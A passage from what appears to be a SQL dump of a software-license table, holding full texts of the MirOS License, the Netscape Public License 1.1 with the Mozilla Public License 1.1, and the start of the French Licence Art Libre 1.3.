accordance with\nthe laws of the State of California and the United States of America, without\nregard to conflict of law principles. The U.N. Convention on Contracts for\nthe International Sale of Goods shall not apply to this Agreement. All disputes\narising out of this Agreement involving VMware or any of its subsidiaries\nshall be subject to the jurisdiction of the federal or state courts of northern\nCalifornia, with venue lying in Santa Clara County, California. No rights\nmay be assigned, no obligations may be delegated, and this Agreement may not\nbe transferred by You, in whole or in part, whether voluntary or by operation\nof law, including by way of sale of assets, merger or consolidation, without\nthe prior written consent of VMware, and any purported assignment, delegation\nor transfer without such consent shall be void ab initio. Any waiver of the\nprovisions of this Agreement or of a party\'s rights or remedies under this\nAgreement must be in writing to be effective. Failure, neglect or delay by\na party to enforce the provisions of this Agreement or its rights or remedies\nat any time, will not be construed or be deemed to be a waiver of such party\'s\nrights under this Agreement and will not in any way affect the validity of\nthe whole or any part of this Agreement or prejudice such party\'s right to\ntake subsequent action.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(238,'MirOS','MirOS License\n\nCopyright [YEAR]\n\n[NAME] [EMAIL]\n\nProvided that these terms and disclaimer and all copyright notices are retained\nor reproduced in an accompanying document, permission is granted to deal in\nthis work without restriction, including unlimited rights to use, publicly\nperform, distribute, sell, modify, merge, give away, or sublicence.\n\nThis work is provided \"AS IS\" and WITHOUT WARRANTY of any kind, to the utmost\nextent permitted by applicable law, neither express nor implied; without malicious\nintent or gross negligence. In no event may a licensor, author or contributor\nbe held liable for indirect, direct, other damage, loss, or other issues arising\nin any way out of dealing in the work, even if advised of the possibility\nof such damage or existence of a defect, except proven that it results out\nof said person\'s immediate fault when using the work as intended. I_N_S_T_R_U_C_T_I_O_N_S_:_\n\nTo apply the template(1) specify the years of copyright (separated by comma,\nnot as a range), the legal names of the copyright holders, and the real names\nof the authors if different. Avoid adding text.\n\nR_A_T_I_O_N_A_L_E_:_\n\nThis licence is apt for any kind of work (such as source code, fonts, documentation,\ngraphics, sound etc.) and the preferred terms for work added to MirBSD. It\nhas been drafted as universally usable equivalent of the \"historic permission\nnotice\"(2) adapted to Europen law because in some (droit d\'auteur) countries\nauthors cannot disclaim all liabi‐ lities. Compliance to DFSG(3) 1.1 is ensured,\nand GPLv2 compatibility is asserted unless advertising clauses are used. The\nMirOS Licence is certified to conform to OKD(4) 1.0 and OSD(5) 1.9, and qualifies\nas a Free Software(6) and also Free Documentation(7) licence and is included\nin some relevant lists(8)(9)(10).\n\nWe believe you are not liable for work inserted which is intellectual property\nof third parties, if you were not aware of the fact, act appropriately as\nsoon as you become aware of that problem, seek an amicable solution for all\nparties, and never knowingly distribute a work without being authorised to\ndo so by its licensors.\n\nR_E_F_E_R_E_N_C_E_S_:_\n\n\n\n (1) also at http://mirbsd.de/MirOS-Licence\n\n (2) http://www.opensource.org/licenses/historical.php\n\n (3) http://www.debian.org/social_contract#guidelines\n\n (4) http://www.opendefinition.org/1.0\n\n (5) http://www.opensource.org/docs/osd\n\n (6) http://www.gnu.org/philosophy/free-sw.html\n\n (7) http://www.gnu.org/philosophy/free-doc.html\n\n (8) http://www.ifross.de/ifross_html/lizenzcenter.html\n\n (9) http://www.opendefinition.org/licenses\n\n (10) http://opensource.org/licenses/miros.html\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(239,'NPL-1.1','Netscape Public LIcense version 1.1\n\nAMENDMENTS\n\nThe Netscape Public License Version 1.1 (\"NPL\") consists of the Mozilla Public\nLicense Version 1.1 with the following Amendments, including Exhibit A-Netscape\nPublic License. Files identified with \"Exhibit A-Netscape Public License\"\nare governed by the Netscape Public License Version 1.1.\n\nAdditional Terms applicable to the Netscape Public License.\n\n I. Effect.\n\nThese additional terms described in this Netscape Public License -- Amendments\nshall apply to the Mozilla Communicator client code and to all Covered Code\nunder this License.\n\nII. \"Netscape\'s Branded Code\" means Covered Code that Netscape distributes\nand/or permits others to distribute under one or more trademark(s) which are\ncontrolled by Netscape but which are not licensed for use under this License.\n\n III. Netscape and logo.\n\nThis License does not grant any rights to use the trademarks \"Netscape\", the\n\"Netscape N and horizon\" logo or the \"Netscape lighthouse\" logo, \"Netcenter\",\n\"Gecko\", \"Java\" or \"JavaScript\", \"Smart Browsing\" even if such marks are included\nin the Original Code or Modifications.\n\n IV. Inability to Comply Due to Contractual Obligation.\n\nPrior to licensing the Original Code under this License, Netscape has licensed\nthird party code for use in Netscape\'s Branded Code. To the extent that Netscape\nis limited contractually from making such third party code available under\nthis License, Netscape may choose to reintegrate such code into Covered Code\nwithout being required to distribute such code in Source Code form, even if\nsuch code would otherwise be considered \"Modifications\" under this License.\n\n V. Use of Modifications and Covered Code by Initial Developer.\n\n V.1. In General.\n\nThe obligations of Section 3 apply to Netscape, except to the extent specified\nin this Amendment, Section V.2 and V.3.\n\n V.2. Other Products.\n\nNetscape may include Covered Code in products other than the Netscape\'s Branded\nCode which are released by Netscape during the two (2) years following the\nrelease date of the Original Code, without such additional products becoming\nsubject to the terms of this License, and may license such additional products\non different terms from those contained in this License.\n\n V.3. Alternative Licensing.\n\nNetscape may license the Source Code of Netscape\'s Branded Code, including\nModifications incorporated therein, without such Netscape Branded Code becoming\nsubject to the terms of this License, and may license such Netscape Branded\nCode on different terms from those contained in this License.\n\n VI. Litigation.\n\nNotwithstanding the limitations of Section 11 above, the provisions regarding\nlitigation in Section 11(a), (b) and (c) of the License shall apply to all\ndisputes relating to this License.\n\n EXHIBIT A-Netscape Public License.\n\n\"The contents of this file are subject to the Netscape Public License Version\n1.1 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.mozilla.org/NPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is Mozilla Communicator client code, released March 31, 1998.\n\nThe Initial Developer of the Original Code is Netscape Communications Corporation.\nPortions created by Netscape are Copyright (C) 1998-1999 Netscape Communications\nCorporation. All Rights Reserved.\n\nContributor(s): ______________________________________.\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the \"[___] License\"), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the NPL, indicate your\ndecision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe NPL or the [___] License.\"\n\nMozilla Public License Version 1.1\n\n 1. Definitions.\n\n1.0.1. \"Commercial Use\" means distribution or otherwise making the Covered\nCode available to a third party.\n\n1.1. \"Contributor\" means each entity that creates or contributes to the creation\nof Modifications.\n\n1.2. \"Contributor Version\" means the combination of the Original Code, prior\nModifications used by a Contributor, and the Modifications made by that particular\nContributor.\n\n1.3. \"Covered Code\" means the Original Code or Modifications or the combination\nof the Original Code and Modifications, in each case including portions thereof.\n\n1.4. \"Electronic Distribution Mechanism\" means a mechanism generally accepted\nin the software development community for the electronic transfer of data.\n\n 1.5. \"Executable\" means Covered Code in any form other than Source Code.\n\n1.6. \"Initial Developer\" means the individual or entity identified as the\nInitial Developer in the Source Code notice required by Exhibit A.\n\n1.7. \"Larger Work\" means a work which combines Covered Code or portions thereof\nwith code not governed by the terms of this License.\n\n 1.8. \"License\" means this document.\n\n1.8.1. \"Licensable\" means having the right to grant, to the maximum extent\npossible, whether at the time of the initial grant or subsequently acquired,\nany and all of the rights conveyed herein.\n\n1.9. \"Modifications\" means any addition to or deletion from the substance\nor structure of either the Original Code or any previous Modifications. When\nCovered Code is released as a series of files, a Modification is:\n\nAny addition to or deletion from the contents of a file containing Original\nCode or previous Modifications.\n\nAny new file that contains any part of the Original Code or previous Modifications.\n\n1.10. \"Original Code\" means Source Code of computer software code which is\ndescribed in the Source Code notice required by Exhibit A as Original Code,\nand which, at the time of its release under this License is not already Covered\nCode governed by this License.\n\n1.10.1. \"Patent Claims\" means any patent claim(s), now owned or hereafter\nacquired, including without limitation, method, process, and apparatus claims,\nin any patent Licensable by grantor.\n\n1.11. \"Source Code\" means the preferred form of the Covered Code for making\nmodifications to it, including all modules it contains, plus any associated\ninterface definition files, scripts used to control compilation and installation\nof an Executable, or source code differential comparisons against either the\nOriginal Code or another well known, available Covered Code of the Contributor\'s\nchoice. The Source Code can be in a compressed or archival form, provided\nthe appropriate decompression or de-archiving software is widely available\nfor no charge.\n\n1.12. \"You\" (or \"Your\") means an individual or a legal entity exercising rights\nunder, and complying with all of the terms of, this License or a future version\nof this License issued under Section 6.1. For legal entities, \"You\" includes\nany entity which controls, is controlled by, or is under common control with\nYou. For purposes of this definition, \"control\" means (a) the power, direct\nor indirect, to cause the direction or management of such entity, whether\nby contract or otherwise, or (b) ownership of more than fifty percent (50%)\nof the outstanding shares or beneficial ownership of such entity.\n\n 2. Source Code License.\n\n2.1. The Initial Developer Grant. The Initial Developer hereby grants You\na world-wide, royalty-free, non-exclusive license, subject to third party\nintellectual property claims:\n\na. under intellectual property rights (other than patent or trademark) Licensable\nby Initial Developer to use, reproduce, modify, display, perform, sublicense\nand distribute the Original Code (or portions thereof) with or without Modifications,\nand/or as part of a Larger Work; and\n\nb. under Patents Claims infringed by the making, using or selling of Original\nCode, to make, have made, use, practice, sell, and offer for sale, and/or\notherwise dispose of the Original Code (or portions thereof).\n\nc. the licenses granted in this Section 2.1 (a) and (b) are effective on the\ndate Initial Developer first distributes Original Code under the terms of\nthis License.\n\nd. Notwithstanding Section 2.1 (b) above, no patent license is granted: 1)\nfor code that You delete from the Original Code; 2) separate from the Original\nCode; or 3) for infringements caused by: i) the modification of the Original\nCode or ii) the combination of the Original Code with other software or devices.\n\n2.2. Contributor Grant. Subject to third party intellectual property claims,\neach Contributor hereby grants You a world-wide, royalty-free, non-exclusive\nlicense\n\na. under intellectual property rights (other than patent or trademark) Licensable\nby Contributor, to use, reproduce, modify, display, perform, sublicense and\ndistribute the Modifications created by such Contributor (or portions thereof)\neither on an unmodified basis, with other Modifications, as Covered Code and/or\nas part of a Larger Work; and\n\nb. under Patent Claims infringed by the making, using, or selling of Modifications\nmade by that Contributor either alone and/or in combination with its Contributor\nVersion (or portions of such combination), to make, use, sell, offer for sale,\nhave made, and/or otherwise dispose of: 1) Modifications made by that Contributor\n(or portions thereof); and 2) the combination of Modifications made by that\nContributor with its Contributor Version (or portions of such combination).\n\nc. the licenses granted in Sections 2.2 (a) and 2.2 (b) are effective on the\ndate Contributor first makes Commercial Use of the Covered Code.\n\nd. Notwithstanding Section 2.2 (b) above, no patent license is granted: 1)\nfor any code that Contributor has deleted from the Contributor Version; 2)\nseparate from the Contributor Version; 3) for infringements caused by: i)\nthird party modifications of Contributor Version or ii) the combination of\nModifications made by that Contributor with other software (except as part\nof the Contributor Version) or other devices; or 4) under Patent Claims infringed\nby Covered Code in the absence of Modifications made by that Contributor.\n\n 3. Distribution Obligations.\n\n3.1. Application of License. The Modifications which You create or to which\nYou contribute are governed by the terms of this License, including without\nlimitation Section 2.2. The Source Code version of Covered Code may be distributed\nonly under the terms of this License or a future version of this License released\nunder Section 6.1, and You must include a copy of this License with every\ncopy of the Source Code You distribute. You may not offer or impose any terms\non any Source Code version that alters or restricts the applicable version\nof this License or the recipients\' rights hereunder. However, You may include\nan additional document offering the additional rights described in Section\n3.5.\n\n3.2. Availability of Source Code. Any Modification which You create or to\nwhich You contribute must be made available in Source Code form under the\nterms of this License either on the same media as an Executable version or\nvia an accepted Electronic Distribution Mechanism to anyone to whom you made\nan Executable version available; and if made available via Electronic Distribution\nMechanism, must remain available for at least twelve (12) months after the\ndate it initially became available, or at least six (6) months after a subsequent\nversion of that particular Modification has been made available to such recipients.\nYou are responsible for ensuring that the Source Code version remains available\neven if the Electronic Distribution Mechanism is maintained by a third party.\n\n3.3. Description of Modifications. You must cause all Covered Code to which\nYou contribute to contain a file documenting the changes You made to create\nthat Covered Code and the date of any change. You must include a prominent\nstatement that the Modification is derived, directly or indirectly, from Original\nCode provided by the Initial Developer and including the name of the Initial\nDeveloper in (a) the Source Code, and (b) in any notice in an Executable version\nor related documentation in which You describe the origin or ownership of\nthe Covered Code.\n\n 3.4. Intellectual Property Matters\n\n (a) Third Party Claims\n\nIf Contributor has knowledge that a license under a third party\'s intellectual\nproperty rights is required to exercise the rights granted by such Contributor\nunder Sections 2.1 or 2.2, Contributor must include a text file with the Source\nCode distribution titled \"LEGAL\" which describes the claim and the party making\nthe claim in sufficient detail that a recipient will know whom to contact.\nIf Contributor obtains such knowledge after the Modification is made available\nas described in Section 3.2, Contributor shall promptly modify the LEGAL file\nin all copies Contributor makes available thereafter and shall take other\nsteps (such as notifying appropriate mailing lists or newsgroups) reasonably\ncalculated to inform those who received the Covered Code that new knowledge\nhas been obtained.\n\n (b) Contributor APIs\n\nIf Contributor\'s Modifications include an application programming interface\nand Contributor has knowledge of patent licenses which are reasonably necessary\nto implement that API, Contributor must also include this information in the\nLEGAL file.\n\n (c) Representations.\n\nContributor represents that, except as disclosed pursuant to Section 3.4 (a)\nabove, Contributor believes that Contributor\'s Modifications are Contributor\'s\noriginal creation(s) and/or Contributor has sufficient rights to grant the\nrights conveyed by this License.\n\n3.5. Required Notices. You must duplicate the notice in Exhibit A in each\nfile of the Source Code. If it is not possible to put such notice in a particular\nSource Code file due to its structure, then You must include such notice in\na location (such as a relevant directory) where a user would be likely to\nlook for such a notice. If You created one or more Modification(s) You may\nadd your name as a Contributor to the notice described in Exhibit A. You must\nalso duplicate this License in any documentation for the Source Code where\nYou describe recipients\' rights or ownership rights relating to Covered Code.\nYou may choose to offer, and to charge a fee for, warranty, support, indemnity\nor liability obligations to one or more recipients of Covered Code. However,\nYou may do so only on Your own behalf, and not on behalf of the Initial Developer\nor any Contributor. You must make it absolutely clear than any such warranty,\nsupport, indemnity or liability obligation is offered by You alone, and You\nhereby agree to indemnify the Initial Developer and every Contributor for\nany liability incurred by the Initial Developer or such Contributor as a result\nof warranty, support, indemnity or liability terms You offer.\n\n3.6. Distribution of Executable Versions. You may distribute Covered Code\nin Executable form only if the requirements of Sections 3.1, 3.2, 3.3, 3.4\nand 3.5 have been met for that Covered Code, and if You include a notice stating\nthat the Source Code version of the Covered Code is available under the terms\nof this License, including a description of how and where You have fulfilled\nthe obligations of Section 3.2. The notice must be conspicuously included\nin any notice in an Executable version, related documentation or collateral\nin which You describe recipients\' rights relating to the Covered Code. You\nmay distribute the Executable version of Covered Code or ownership rights\nunder a license of Your choice, which may contain terms different from this\nLicense, provided that You are in compliance with the terms of this License\nand that the license for the Executable version does not attempt to limit\nor alter the recipient\'s rights in the Source Code version from the rights\nset forth in this License. If You distribute the Executable version under\na different license You must make it absolutely clear that any terms which\ndiffer from this License are offered by You alone, not by the Initial Developer\nor any Contributor. You hereby agree to indemnify the Initial Developer and\nevery Contributor for any liability incurred by the Initial Developer or such\nContributor as a result of any such terms You offer.\n\n3.7. Larger Works. You may create a Larger Work by combining Covered Code\nwith other code not governed by the terms of this License and distribute the\nLarger Work as a single product. In such a case, You must make sure the requirements\nof this License are fulfilled for the Covered Code.\n\n 4. Inability to Comply Due to Statute or Regulation.\n\nIf it is impossible for You to comply with any of the terms of this License\nwith respect to some or all of the Covered Code due to statute, judicial order,\nor regulation then You must: (a) comply with the terms of this License to\nthe maximum extent possible; and (b) describe the limitations and the code\nthey affect. Such description must be included in the LEGAL file described\nin Section 3.4 and must be included with all distributions of the Source Code.\nExcept to the extent prohibited by statute or regulation, such description\nmust be sufficiently detailed for a recipient of ordinary skill to be able\nto understand it.\n\n 5. Application of this License.\n\nThis License applies to code to which the Initial Developer has attached the\nnotice in Exhibit A and to related Covered Code.\n\n 6. Versions of the License.\n\n 6.1. New Versions\n\nNetscape Communications Corporation (\"Netscape\") may publish revised and/or\nnew versions of the License from time to time. Each version will be given\na distinguishing version number.\n\n 6.2. Effect of New Versions\n\nOnce Covered Code has been published under a particular version of the License,\nYou may always continue to use it under the terms of that version. You may\nalso choose to use such Covered Code under the terms of any subsequent version\nof the License published by Netscape. No one other than Netscape has the right\nto modify the terms applicable to Covered Code created under this License.\n\n 6.3. Derivative Works\n\nIf You create or use a modified version of this License (which you may only\ndo in order to apply it to code which is not already Covered Code governed\nby this License), You must (a) rename Your license so that the phrases \"Mozilla\",\n\"MOZILLAPL\", \"MOZPL\", \"Netscape\", \"MPL\", \"NPL\" or any confusingly similar\nphrase do not appear in your license (except to note that your license differs\nfrom this License) and (b) otherwise make it clear that Your version of the\nlicense contains terms which differ from the Mozilla Public License and Netscape\nPublic License. (Filling in the name of the Initial Developer, Original Code\nor Contributor in the notice described in Exhibit A shall not of themselves\nbe deemed to be modifications of this License.)\n\n 7. DISCLAIMER OF WARRANTY\n\nCOVERED CODE IS PROVIDED UNDER THIS LICENSE ON AN \"AS IS\" BASIS, WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES\nTHAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR\nPURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE\nOF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN\nANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME\nTHE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. THIS DISCLAIMER\nOF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED\nCODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.\n\n 8. Termination\n\n8.1. This License and the rights granted hereunder will terminate automatically\nif You fail to comply with terms herein and fail to cure such breach within\n30 days of becoming aware of the breach. All sublicenses to the Covered Code\nwhich are properly granted shall survive any termination of this License.\nProvisions which, by their nature, must remain in effect beyond the termination\nof this License shall survive.\n\n8.2. If You initiate litigation by asserting a patent infringement claim (excluding\ndeclatory judgment actions) against Initial Developer or a Contributor (the\nInitial Developer or Contributor against whom You file such action is referred\nto as \"Participant\") alleging that:\n\na. such Participant\'s Contributor Version directly or indirectly infringes\nany patent, then any and all rights granted by such Participant to You under\nSections 2.1 and/or 2.2 of this License shall, upon 60 days notice from Participant\nterminate prospectively, unless if within 60 days after receipt of notice\nYou either: (i) agree in writing to pay Participant a mutually agreeable reasonable\nroyalty for Your past and future use of Modifications made by such Participant,\nor (ii) withdraw Your litigation claim with respect to the Contributor Version\nagainst such Participant. If within 60 days of notice, a reasonable royalty\nand payment arrangement are not mutually agreed upon in writing by the parties\nor the litigation claim is not withdrawn, the rights granted by Participant\nto You under Sections 2.1 and/or 2.2 automatically terminate at the expiration\nof the 60 day notice period specified above.\n\nb. any software, hardware, or device, other than such Participant\'s Contributor\nVersion, directly or indirectly infringes any patent, then any rights granted\nto You by such Participant under Sections 2.1(b) and 2.2(b) are revoked effective\nas of the date You first made, used, sold, distributed, or had made, Modifications\nmade by that Participant.\n\n8.3. If You assert a patent infringement claim against Participant alleging\nthat such Participant\'s Contributor Version directly or indirectly infringes\nany patent where such claim is resolved (such as by license or settlement)\nprior to the initiation of patent infringement litigation, then the reasonable\nvalue of the licenses granted by such Participant under Sections 2.1 or 2.2\nshall be taken into account in determining the amount or value of any payment\nor license.\n\n8.4. In the event of termination under Sections 8.1 or 8.2 above, all end\nuser license agreements (excluding distributors and resellers) which have\nbeen validly granted by You or any distributor hereunder prior to termination\nshall survive termination.\n\n 9. LIMITATION OF LIABILITY\n\nUNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, WHETHER TORT (INCLUDING\nNEGLIGENCE), CONTRACT, OR OTHERWISE, SHALL YOU, THE INITIAL DEVELOPER, ANY\nOTHER CONTRIBUTOR, OR ANY DISTRIBUTOR OF COVERED CODE, OR ANY SUPPLIER OF\nANY OF SUCH PARTIES, BE LIABLE TO ANY PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL,\nOR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES\nFOR LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY\nAND ALL OTHER COMMERCIAL DAMAGES OR LOSSES, EVEN IF SUCH PARTY SHALL HAVE\nBEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES. THIS LIMITATION OF LIABILITY\nSHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY RESULTING FROM SUCH\nPARTY\'S NEGLIGENCE TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION.\nSOME JURISDICTIONS DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL\nOR CONSEQUENTIAL DAMAGES, SO THIS EXCLUSION AND LIMITATION MAY NOT APPLY TO\nYOU.\n\n 10. U.S. government end users\n\nThe Covered Code is a \"commercial item,\" as that term is defined in 48 C.F.R.\n2.101 (Oct. 1995), consisting of \"commercial computer software\" and \"commercial\ncomputer software documentation,\" as such terms are used in 48 C.F.R. 12.212\n(Sept. 1995). Consistent with 48 C.F.R. 12.212 and 48 C.F.R. 227.7202-1 through\n227.7202-4 (June 1995), all U.S. Government End Users acquire Covered Code\nwith only those rights set forth herein.\n\n 11. Miscellaneous\n\nThis License represents the complete agreement concerning subject matter hereof.\nIf any provision of this License is held to be unenforceable, such provision\nshall be reformed only to the extent necessary to make it enforceable. This\nLicense shall be governed by California law provisions (except to the extent\napplicable law, if any, provides otherwise), excluding its conflict-of-law\nprovisions. With respect to disputes in which at least one party is a citizen\nof, or an entity chartered or registered to do business in the United States\nof America, any litigation relating to this License shall be subject to the\njurisdiction of the Federal Courts of the Northern District of California,\nwith venue lying in Santa Clara County, California, with the losing party\nresponsible for costs, including without limitation, court costs and reasonable\nattorneys\' fees and expenses. The application of the United Nations Convention\non Contracts for the International Sale of Goods is expressly excluded. Any\nlaw or regulation which provides that the language of a contract shall be\nconstrued against the drafter shall not apply to this License.\n\n 12. Responsibility for claims\n\nAs between Initial Developer and the Contributors, each party is responsible\nfor claims and damages arising, directly or indirectly, out of its utilization\nof rights under this License and You agree to work with Initial Developer\nand Contributors to distribute such responsibility on an equitable basis.\nNothing herein is intended or shall be deemed to constitute any admission\nof liability.\n\n 13. Multiple-licensed code\n\nInitial Developer may designate portions of the Covered Code as \"Multiple-Licensed\".\n\"Multiple-Licensed\" means that the Initial Developer permits you to utilize\nportions of the Covered Code under Your choice of the MPL or the alternative\nlicenses, if any, specified by the Initial Developer in the file described\nin Exhibit A. Exhibit A - Mozilla Public License.\n\n\"The contents of this file are subject to the Mozilla Public License Version\n1.1 (the \"License\"); you may not use this file except in compliance with the\nLicense. You may obtain a copy of the License at http://www.mozilla.org/MPL/\n\nSoftware distributed under the License is distributed on an \"AS IS\" basis,\nWITHOUT WARRANTY OF ANY KIND, either express or implied. See the License for\nthe specific language governing rights and limitations under the License.\n\nThe Original Code is ______________________________________.\n\nThe Initial Developer of the Original Code is ________________________.\n\nPortions created by ______________________ are Copyright (C) ______\n\n_______________________. All Rights Reserved.\n\nContributor(s): ______________________________________.\n\nAlternatively, the contents of this file may be used under the terms of the\n_____ license (the \"[___] License\"), in which case the provisions of [______]\nLicense are applicable instead of those above. If you wish to allow use of\nyour version of this file only under the terms of the [____] License and not\nto allow others to use your version of this file under the MPL, indicate your\ndecision by deleting the provisions above and replace them with the notice\nand other provisions required by the [___] License. If you do not delete the\nprovisions above, a recipient may use your version of this file under either\nthe MPL or the [___] License.\"\n\nNOTE: The text of this Exhibit A may differ slightly from the text of the\nnotices in the Source Code files of the Original Code. You should use the\ntext of this Exhibit A rather than the text found in the Original Code Source\nCode for Your Modifications.\n','2020-08-04 08:07:02','2020-08-04 08:07:02',0),(240,'LAL-1.3','Licence Art Libre 1.3 (LAL 1.3)\n\nPréambule :\n\nAvec la Licence Art Libre, l\'autorisation est donnée de copier, de diffuser\net de transformer librement les œuvres dans le respect des droits de l\'auteur.\n\nLoin d\'ignorer ces droits, la Licence Art Libre les reconnaît et les protège.\nElle en reformule l\'exercice en permettant à tout un chacun de faire un usage\ncréatif des productions de l\'esprit quels que soient leur genre et leur forme\nd\'expression.\n\nSi, en règle générale, l\'application du droit d\'auteur conduit à restreindre\nl\'accès aux œuvres de l\'esprit, la Licence Art Libre, au contraire, le favorise.\nL\'intention est d\'autoriser l\'utilisation des ressources d\'une œuvre ; créer\nde nouvelles conditions de création pour amplifier les possibilités de création.\nLa Licence Art Libre permet d\'avoir jouissance des œuvres tout en reconnaissant\nles droits et les responsabilités de chacun.\n\nAvec le développement du numérique, l\'invention d\'internet et des logiciels\nlibres, les modalités de création ont évolué : les productions de l\'esprit\ns\'offrent naturellement à la circulation, à l\'échange et aux transformations.\nElles se prêtent favorablement à la réalisation d\'œuvres communes que chacun\npeut augmenter pour l\'avantage de tous.\n\nC\'est la raison essentielle de la Licence Art Libre : promouvoir et protéger\nces productions de l\'esprit selon les principes du copyleft : liberté d\'usage,\nde copie, de diffusion, de transformation et interdiction d\'appropriation\nexclusive.\n\nDéfinitions :\n\nNous désignons par « œuvre », autant l\'œuvre initiale, les œuvres conséquentes,\nque l\'œuvre commune telles que définies ci-après :\n\nL\'œuvre commune : Il s\'agit d\'une œuvre qui comprend l\'œuvre initiale ainsi\nque toutes les contributions postérieures (les originaux conséquents et les\ncopies). Elle est créée à l\'initiative de l\'auteur initial qui par cette licence\ndéfinit les conditions selon lesquelles les contributions sont faites.\n\nL\'œuvre initiale : C\'est-à-dire l\'œuvre créée par l\'initiateur de l\'œuvre\ncommune dont les copies vont être modifiées par qui le souhaite.\n\nLes œuvres conséquentes : C\'est-à-dire les contributions des auteurs qui participent\nà la formation de l\'œuvre commune en faisant usage des droits de reproduction,\nde diffusion et de modification que leur confère la licence.\n\nOriginaux (sources ou ressources de l\'œuvre) : Chaque exemplaire daté de l\'œuvre\ninitiale ou conséquente que leurs auteurs présentent comme référence pour\ntoutes actualisations, interprétations, copies ou reproductions ultérieures.\n\nCopie : Toute reproduction d\'un original au sens de cette licence.\n\n 1- OBJET.\n\nCette licence a pour objet de définir les conditions selon lesquelles vous\npouvez jouir librement de l\'œuvre.\n\n 2. L\'ÉTENDUE DE LA JOUISSANCE.\n\nCette œuvre est soumise au droit d\'auteur, et l\'auteur par cette licence vous\nindique quelles sont vos libertés pour la copier, la diffuser et la modifier.\n\n 2.1 LA LIBERTÉ DE COPIER (OU DE REPRODUCTION).\n\nVous avez la liberté de copier cette œuvre pour vous, vos amis ou toute autre\npersonne, quelle que soit la technique employée.\n\n 2.2 LA LIBERTÉ DE DIFFUSER (INTERPRÉTER, REPRÉSENTER, DISTRIBUER).\n\nVous pouvez diffuser librement les copies de ces œuvres, modifiées ou non,\nquel que soit le support, quel que soit le lieu, à titre onéreux ou gratuit,\nsi vous respectez toutes les conditions suivantes :\n\n1. joindre aux copies cette licence à l\'identique ou indiquer précisément\noù se trouve la licence ;\n\n2. indiquer au destinataire le nom de chaque auteur des originaux, y compris\nle vôtre si vous avez modifié l\'œuvre ;\n\n3. indiquer au destinataire où il pourrait avoir accès aux originaux (initiaux\net/ou conséquents).\n\nLes auteurs des originaux pourront, s\'ils le souhaitent, vous autoriser à\ndiffuser l\'original dans les mêmes conditions que les copies.\n\n 2.3 LA LIBERTÉ DE MODIFIER.\n\nVous avez la liberté de modifier les copies des originaux (initiaux et conséquents)\ndans le respect des conditions suivantes :\n\n1. celles prévues à l\'article 2.2 en cas de diffusion de la copie modifiée\n;\n\n2. indiquer qu\'il s\'agit d\'une œuvre modifiée et, si possible, la nature de\nla modification ;\n\n3. diffuser cette œuvre conséquente avec la même licence ou avec toute licence\ncompatible ;\n\n4. Les auteurs des originaux pourront, s\'ils le souhaitent, vous autoriser\nà modifier l\'original dans les mêmes conditions que les copies.\n\n 3. DROITS CONNEXES.\n\nLes actes donnant lieu à des droits d\'auteur ou des droits voisins ne doivent\npas constituer un obstacle aux libertés conférées par cette licence. C\'est\npourquoi, par exemple, les interprétations doivent être soumises à la même\nlicence ou une licence compatible. De même, l\'intégration de l\'œuvre à une\nbase de données, une compilation ou une anthologie ne doit pas faire obstacle\nà la jouissance de l\'œuvre telle que définie par cette licence.\n\n 4. L\' INTÉGRATION DE L\'ŒUVRE.\n\nToute intégration de cette œuvre à un ensemble non soumis à la LAL doit assurer\nl\'exercice des libertés conférées par cette licence.\n\nSi l\'œuvre n\'est plus accessible indépendamment de l\'ensemble, alors l\'intégration\nn\'est possible qu\'à condition que l\'ensemble soit soumis à la LAL ou une licence\ncompatible.\n\n 5. CRITÈRES DE COMPATIBILITÉ.\n\n Une licence est compatible avec la LAL si et seulement si :\n\n1. elle accorde l\'autorisation de copier, diffuser et modifier des copies\nde l\'œuvre, y compris à des fins lucratives, et sans autres restrictions que\ncelles qu\'impose le respect des autres critères de compatibilité ;\n\n2. elle garantit la paternité de l\'œuvre et l\'accès aux versions antérieures\nde l\'œuvre quand cet accès est possible ;\n\n 3. elle reconnaît la LAL également compatible (réciprocité) ;\n\n4. elle impose que les modifications faites sur l\'œuvre soient soumises à\nla même licence ou encore à une licence répondant aux critères de compatibilité\nposés par la LAL.\n\n 6. VOS DROITS INTELLECTUELS.\n\nLa LAL n\'a pas pour objet de nier vos droits d\'auteur sur votre contribution\nni vos droits connexes. En choisissant de contribuer à l\'évolution de cette\nœuvre commune, vous acceptez seulement d\'offrir aux autres les mêmes autorisations\nsur votre contribution que celles qui vous ont été accordées par cette licence.\nCes autorisations n\'entraînent pas un dessaisissement de vos droits intellectuels.\n\n 7. VOS RESPONSABILITÉS.\n\nLa liberté de jouir de l\'œuvre tel que permis par la LAL (liberté de copier,\ndiffuser, modifier) implique pour chacun la responsabilité de ses 